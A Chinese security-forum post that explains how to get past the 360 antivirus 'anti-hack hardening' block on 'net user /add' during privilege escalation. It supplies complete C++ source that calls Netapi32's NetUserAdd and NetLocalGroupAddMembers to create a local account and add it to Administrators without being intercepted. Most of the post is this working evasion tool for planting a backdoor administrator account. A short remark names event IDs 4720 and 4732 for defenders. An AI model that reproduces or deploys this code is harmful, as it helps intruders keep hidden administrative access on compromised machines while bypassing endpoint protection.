
突破360防黑加固添加用户

发布于:2013-01-18 14:57
360功能多,现在大多管理员图省事喜欢安个360。360有个"防黑加固"功能比较坑爹:提权的时候经常会用到 `net user xxx xxx /add` 和 `net localgroup xxx xxx /add`,360会拦截,如图:

图片:20130118111124982.jpg


net user 和 net1 user 都被拦截了,把 net.exe/net1.exe 改名后执行同样被拦截,说明拦截并不只看文件名,想想这功能也不能这么鸡肋。当然360还会拦截其他命令,这次只讨论 `net user xxx xxx /add`。于是索性自己用 Netapi32 的 NetUserAdd / NetLocalGroupAddMembers 写一个(net 命令底层也是通过这类 API 操作 SAM 的),直接调用 API 时 360 没有拦截,如图。需要注意的是:这只是绕过了对 net 命令本身的拦截,账户仍然是真实创建的,系统安全日志中的账户创建/组成员变更事件(如 4720、4732)一般照常产生,做防守的人应该盯这些事件而不是只盯命令行。

图片:20130118111125333.jpg


源码(代码使用了 new/delete,在 MSVC 下按 C++ 编译;转载时原文中的 `&` 被丢失成了 `;`,下面已还原):
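// Code by pnig0s   Date: 2012-03-17
//
// Creates a local account and puts it in the Administrators group by
// calling Netapi32 directly (NetUserAdd / NetLocalGroupAddMembers) instead
// of spawning "net user ... /add".  The forum post's observation is that a
// hook on net.exe / net1.exe does not see these API calls.  The SAM change
// itself is identical, so host auditing of account creation is unaffected.
//
// Build: Windows, MSVC.  The code uses new/delete[], so compile as C++.
// The caller's token must be allowed to create local accounts (in practice
// a member of Administrators).
#include <stdio.h>
#include <string.h>
#include <Windows.h>
#include <lm.h>
#pragma comment(lib, "Netapi32.lib")

int AddUser(LPWSTR lpUsername, LPWSTR lpPassword, LPWSTR lpServerName);
int SetGroup(LPWSTR lpUsername, LPWSTR lpServerName, LPWSTR lpGroupName);
BOOL ImprovePriv(LPWSTR name);

// Converts an ANSI (CP_ACP) argv string to a newly allocated wide string.
// Returns NULL on failure (GetLastError() describes it).  The caller owns
// the result and must delete[] it.
static wchar_t *ToWide(const char *narrow)
{
    int size = MultiByteToWideChar(CP_ACP, 0, narrow, -1, NULL, 0);
    if (size <= 0) {
        return NULL;
    }
    // size already includes the terminating NUL because the input length is -1.
    wchar_t *wide = new wchar_t[size];
    if (!MultiByteToWideChar(CP_ACP, 0, narrow, -1, wide, size)) {
        delete[] wide;
        return NULL;
    }
    return wide;
}

// Usage: <exe> UserName Password
// Exit code: 0 when both the add and the group change succeed, otherwise
// non-zero (the original always returned 0 at the end, and returned 0 on a
// failed string conversion too, so failures were invisible to a caller).
int main(INT argc, char *argv[])
{
    // Usage check first; the original enabled the privilege before looking
    // at argc, which is pointless work on a bad command line.
    if (argc < 3) {
        printf("\nCode by Pnig0s1992");
        printf("\nUsage:");
        printf("\n\t%s UserName Password", argv[0]);
        printf("\n\tRemark:Default add to Group:Administrators.");
        return -1;
    }

    // Kept from the original: try to enable SeMachineAccountPrivilege.
    // NOTE(review): the Netapi32 documentation gates NetUserAdd on
    // Administrators / Account Operators membership, not on this privilege,
    // so this step is probably unnecessary for a local add.  It is retained
    // (including the abort on failure) so the tool behaves as before.
    if (ImprovePriv(SE_MACHINE_ACCOUNT_NAME)) {
        printf("Successfully promote priv!");
    } else {
        printf("Failed promote priv.");
        return -1;
    }

    wchar_t *wUserName = ToWide(argv[1]);
    if (wUserName == NULL) {
        printf("\nFailed to convert user name.(%lu)", (unsigned long)GetLastError());
        return -1;
    }
    wchar_t *wPassword = ToWide(argv[2]);
    if (wPassword == NULL) {
        printf("\nFailed to convert password.(%lu)", (unsigned long)GetLastError());
        delete[] wUserName;
        return -1;
    }

    LPWSTR lpSevName = NULL;                 // NULL = the local machine
    LPWSTR lpGroupName = L"Administrators";  // NOTE(review): English name only;
                                             // localized Windows may report
                                             // NERR_GroupNotFound here.

    int rcAdd = AddUser(wUserName, wPassword, lpSevName);
    // SetGroup is attempted even when AddUser failed (e.g. NERR_UserExists),
    // exactly as the original did: an already-existing account is still
    // moved into the group.
    int rcGroup = SetGroup(wUserName, lpSevName, lpGroupName);

    // Do not leave the clear-text password behind in freed heap memory.
    SecureZeroMemory(wPassword, wcslen(wPassword) * sizeof(wchar_t));
    delete[] wPassword;
    delete[] wUserName;

    return (rcAdd == 0 && rcGroup == 0) ? 0 : 1;
}

// Enables the named privilege on the current process token.
// Returns TRUE when OpenProcessToken, LookupPrivilegeValue and
// AdjustTokenPrivileges all succeed.  If the token simply does not hold the
// privilege, AdjustTokenPrivileges still returns non-zero but sets
// ERROR_NOT_ALL_ASSIGNED; the original printed "success" in that case, so a
// warning is now emitted (the return value is unchanged to keep the flow).
// The token handle was leaked on the failure paths before; it is now closed
// on every path.
BOOL ImprovePriv(LPWSTR name)
{
    HANDLE hToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        printf("\nGet process token failed.(%lu)", (unsigned long)GetLastError());
        return FALSE;
    }

    BOOL ok = FALSE;
    TOKEN_PRIVILEGES tkp;
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!LookupPrivilegeValue(NULL, name, &tkp.Privileges[0].Luid)) {
        printf("\nLookup process priv failed.(%lu)", (unsigned long)GetLastError());
    } else if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, NULL)) {
        printf("\nAjust process priv failed.(%lu)", (unsigned long)GetLastError());
    } else {
        if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
            printf("\nWarning: token does not hold %S (ERROR_NOT_ALL_ASSIGNED).", name);
        }
        ok = TRUE;
    }

    CloseHandle(hToken);
    return ok;
}

// Creates a local user account with USER_PRIV_USER rights.
// lpServerName NULL targets the local machine.
// Returns the NET_API_STATUS as an int (0 == NERR_Success), so callers can
// test the result; the original always returned 0.
int AddUser(LPWSTR lpUsername, LPWSTR lpPassword, LPWSTR lpServerName)
{
    USER_INFO_1 ui = {0};            // usri1_password_age was left uninitialised before
    ui.usri1_name = lpUsername;
    ui.usri1_password = lpPassword;
    ui.usri1_priv = USER_PRIV_USER;
    ui.usri1_home_dir = NULL;
    ui.usri1_comment = NULL;
    ui.usri1_flags = UF_SCRIPT;      // required by NetUserAdd
    ui.usri1_script_path = NULL;

    DWORD dwError = 0;               // index of the bad member on ERROR_INVALID_PARAMETER
    NET_API_STATUS nStatus = NetUserAdd(lpServerName, 1, (LPBYTE)&ui, &dwError);
    if (nStatus == NERR_Success) {
        printf("\nAdd user:%S successfully!", lpUsername);
    } else {
        printf("\nAdd user failed:%lu.", (unsigned long)nStatus);
        if (nStatus == ERROR_INVALID_PARAMETER) {
            printf(" (invalid member index %lu)", (unsigned long)dwError);
        }
    }
    return (int)nStatus;
}

// Adds lpUsername to the local group lpGroupName on lpServerName
// (NULL = local machine).  Returns the NET_API_STATUS as an int
// (0 == NERR_Success).
int SetGroup(LPWSTR lpUsername, LPWSTR lpServerName, LPWSTR lpGroupName)
{
    LOCALGROUP_MEMBERS_INFO_3 lgui;
    lgui.lgrmi3_domainandname = lpUsername;   // level 3: member identified by name

    NET_API_STATUS nStatus = NetLocalGroupAddMembers(lpServerName, lpGroupName, 3, (LPBYTE)&lgui, 1);
    if (nStatus == NERR_Success) {
        printf("\nSuccessfully set USER:%S to GROUP:%S!", lpUsername, lpGroupName);
    } else if (nStatus == NERR_GroupNotFound) {
        printf("\nCan't find such a group:%S.", lpGroupName);
    } else {
        printf("\nSet GROUP:%S failed.", lpGroupName);
    }
    return (int)nStatus;
}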
